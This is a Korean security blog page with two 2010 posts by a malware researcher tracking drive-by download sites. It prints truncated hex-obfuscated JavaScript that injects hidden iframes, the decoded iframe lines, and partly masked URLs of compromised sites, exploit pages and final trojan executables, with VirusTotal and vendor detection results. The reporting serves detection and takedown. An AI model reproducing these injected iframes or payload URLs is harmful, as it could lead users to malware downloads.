'XOR 변형'에 해당되는 글 2건

  1. 2010.09.19 아스키 코드로 이루어진 악성 아이프레임 !!
  2. 2010.07.27 지난주 악성코드 유포지 6곳 !! (2)
posted by Kwan's 2010. 9. 19. 21:04
지난번에는 아스키 코드로 이루어진 htm 파일을 소개 했지만 이번에는 정상 페이지에 악성 아이프레임을 삽입 되어있는 사이트를 찾아서 이렇게 글을 써본다. 이번에는 아이프레임만 찾아 낸다면 최종파일에 접근을 금방 할 수 있도록 되어있다.
그 내부 파일을 보면 다음과 같다.

[첫부분 생략]

top_html +="    <TD width=\"1\"></TD>";
top_html +="    <TD style=\"width:1px; height:2px; background-color:"+c+";\"></TD>";
top_html +="    <TD colspan=\"3\" bgcolor=\""+bg+"\"></TD>";
top_html +="    <TD style=\"width:1px; height:2px; background-color:"+c+";\"></TD>";
top_html +="    <TD width=\"1\"></TD>";
top_html +="  </TR>";
top_html +="</TABLE>";
document.write(top_html);
}
window["\x64\x6f(중략)\x6e\x74"]["\x77\x72(중략)\x72\(중략)\x3d\x30\x3e\x3c\/(중략)\x72\x61(중략)\x3e");
window["\x64\x6f(중략)\x6e\x74"]["\x77(중략)\x6f\(중략)\x3d\x30\x3e\x3c\/(중략)\x72\x61\(중략)x65\x3e");
function bottom_round(w,c,bg)

[마지막 부분 생략]

이 코드를 처음 봤을때는 아스키인지도 눈치 채지 못하고 그냥 넘어갔고 나중에야 알았다. 이렇식으로 아스키를 일반 JS 에 숨겨놓으니 감쪽과도 같았다. 아스키 코드 변경 방식은 \x 를 , 로 리플레이스 해준다면 더 보기 쉬울것이다. 이런 아스키 코드를 검색을 통해 다시 문자열로 바꾼다면 쉽게 아이프레임을 확인 할 수 있다.
아스키 코드를 해석된 아이프레임 사이트는 다음과 같다.

documentwriteln"]("<iframe src=http:\/\/ha(중략)..com\/index.htm width=0 height=0 scrolling=no frameborder=0><iframe>
document"]["writeln"]("<iframe src=http:\/\/www.cc(중략).com\/xx.htm width=0 height=0 scrolling=no frameborder=0><\/iframe>

이중 xx.htm (Exploit.JS.CVE-2010-0806.ao) 에서 최종 파일을 받는 역할을 하는것으로 나타나고 있다.
xx.htm 또한 MXMZ5858 이런식으로 리플레이스가 필요한 코드로써 다시 한번 디코딩해야 비로서 최종파일인 k917r.exe 이 나온다.

* 단 최종파일 k917r.exe는 XOR 변형을 해주어야만 본 역활인 악성 코드 역활을 할 수 있습니다.

* 신고 업체 : 안철수연구소 , 이스트 소프트 , 네이버 백신

[바이러스 토탈 결과]

xx.0tm : http://www.virustotal.com/file-scan/report.html?id=69ea0d2bdee2c4939e587c83b04cee016ed91743127da293213f4c3bfbea79fb-1284897546

k917r.0xe : http://www.virustotal.com/file-scan/report.html?id=39f39fe59ec5708cffb1f0f2175cd320915c42d545b554575408fec75dff6540-1284897550

k917r.exe_Kwan : http://www.virustotal.com/file-scan/report.html?id=977548297fb097f1a6fd39950c7273b26948e163c1bd329cdc1c2a91e504d26c-1284895437

관련글 : 아스키 코드를 이용한 악성코드 !!

댓글을 달아 주세요

posted by Kwan's 2010. 7. 27. 10:23

1. 사이트 !!
한국 X 스X츠 협회 : http://www.x-sxxxts.or.kr
씨X통 : http://www.cixxxxng.com
SSO XXX : http://sso.xxx.co.kr
씨X마 XXX : http://cixxma.xxx.co.kr

2. 유포지 !!

한국 X 스X츠 협회 , 씨X통 : http://2x8.xx.58.1x5/H.asp

SSO XXX : http://1x4.2xx.87.1xx/Login.asp

씨X마 XXX : http://junxxoxanix.nexxicient.co.kr/sub_logo1.jpg
                  http://junxxoxanix.nexxicient.co.kr/aad.jpg ~> 최종파일 다운 !!
                  http://junxxoxanix.nexxicient.co.kr/aac.jpg
                  http://junxxoxanix.nexxicient.co.kr/aab.jpg

3. 기타 사이트 !!

1. http://wxxx.com

2. http://axurxxrpoxxtion.com/ccc.html

4. 최종파일 !!

H.asp : http://lxxxxllxxtion.net/mxxl/coxx/pxxup/f.exe

Login.asp : http://1x1.xx.2x8.xx/fxx/723.exe

aad.jpg : http://junxxoxanix.nexxicient.co.kr/test0.exe

index.html : http://www.vxxx.com/vie.exe ~> XOR 변형이 필요 합니다 !

ccc.html : http://axurxxrpoxxtion.com/report.exe

5. 바이러스 토탈

H.asp : http://www.virustotal.com/ko/analisis/fcbf0d507d897dc20e265fbe95724c644a4510910a69aeca7a70ffde249b5919-1280191608

Login.asp : http://www.virustotal.com/ko/analisis/5e36eb37398661286f8f727151eef253c5a7c8fa2ae48c17ddaf33d4bac0a2b0-1280191644

sub_logo1.jpg : http://www.virustotal.com/ko/analisis/a47776d166630a90ffa0a5705bd64cee84d3dd8a5023f8fd261ec995c7ef03c6-1280191678

aad.jpg : http://www.virustotal.com/ko/analisis/aee86dd58e548b6d43ca35670a4c2feb17ed5482e40e444fa93ab32509d56c87-1280191799

aac.jpg : http://www.virustotal.com/ko/analisis/431413212a9208744e7acc90561aef3613b15755f64f57c07300ca8f0e381d3f-1280191806

aab.jpg : http://www.virustotal.com/ko/analisis/2815c9c001eb7eef52e81811035bb08d8034bbeb7700ee7e44f46e8119ae2aaf-1280191811

index.html : http://www.virustotal.com/ko/analisis/273972df000bc0dfa9cd2e11e7139472bee63cc41c07685865e5624c62db441f-1280191931

ccc.html : http://www.virustotal.com/ko/analisis/a71f4600dc72ed82ea6e87646407eb4810590d98c3acc9e7d069281d33781201-1280191940

f.exe : http://www.virustotal.com/ko/analisis/4d24d4def8391f63a4a118635d7978ab1fd048dd204534144c8f5c408c4c9db5-1280191960

723.exe : http://www.virustotal.com/ko/analisis/44cb7f3df7b99bec7ffca0653841e80e57e6b17dcd4c7186d6645009faa58d05-1280192056

test0.exe : http://www.virustotal.com/ko/analisis/4458f629bc535508942343b9b667f34ca4050db90126d737de97e460b0dbde79-1280192062

vie.exe : http://www.virustotal.com/ko/analisis/b12a75ce4508cc18049b9ddf40882162c127a94e8a82944d8d18af169b0257fa-1280192079

vie.exe_Kwan : http://www.virustotal.com/ko/analisis/61a4c0edede4eea39a0145e222fb74a8d1af757ab5dc510f2c395893285cebcc-1280192262

report.exe : http://www.virustotal.com/ko/analisis/83fcb1c44627d254b8fcab19044a5857a765de798885302451f65e5a74de2b38-1280192210

6. 안철수연구소 및 이스트 소프트 진단 !

이스트 소프트 : 샘플 세부 확인중 !!

[안철수 연구소]

1. index.html ~> 분석중
2. vie.exe ~> 분석중
3. sub_logo1.jpg ~> 분석중
4. vie.exe_Kwan ~> 분석중
5. ccc.html ~> 분석중
6. H.asp V3 : JS/Downloader(추가 : 2010.07.26.02)
7. aad.jpg V3 : JS/Agent(추가 : 2010.07.26.02)
8. f.exe V3 : Win-Trojan/Onlinegamehack.109928(추가 : 2010.07.26.02)
9. test0.exe V3 : Win-Trojan/Malagent.55296(추가 : 2010.07.26.01)
10. 723.exe V3 : Win-Trojan/Pwstealer.55296.F(추가 : 2010.07.24.00)
11. Login.asp V3 : HTML/Downloader(추가 : 2010.07.24.00)
12. report.exe V3 : Win-Trojan/Downloader.148480.F(추가 : 2010.07.23.02)
13. aac.jpg V3 : JS/Exploit(추가 : 2010.07.19.00)
14. aab.jpg V3 : JS/Exploit(추가 : 2010.07.19.00)

이번주도 유포하는 곳만 찾았네요. 이제는 새로운곳이 거의 없는거 같아요 !!
이제는 또 감을 잃어버리고 있네요. 

이번주 도와주신분 : 없음

댓글을 달아 주세요

  1. virusfree 2010.07.27 10:48 신고  Addr  Edit/Del  Reply

    수고하셨습니다.^^

    • Kwan's 2010.07.27 10:51 신고  Addr  Edit/Del

      감사합니다~ㅎ 별 내용도 아닌글인데 좋게 봐주셔서 감사합니다!ㅎ 무더운데 고생이 많으시겠어요~ㅎ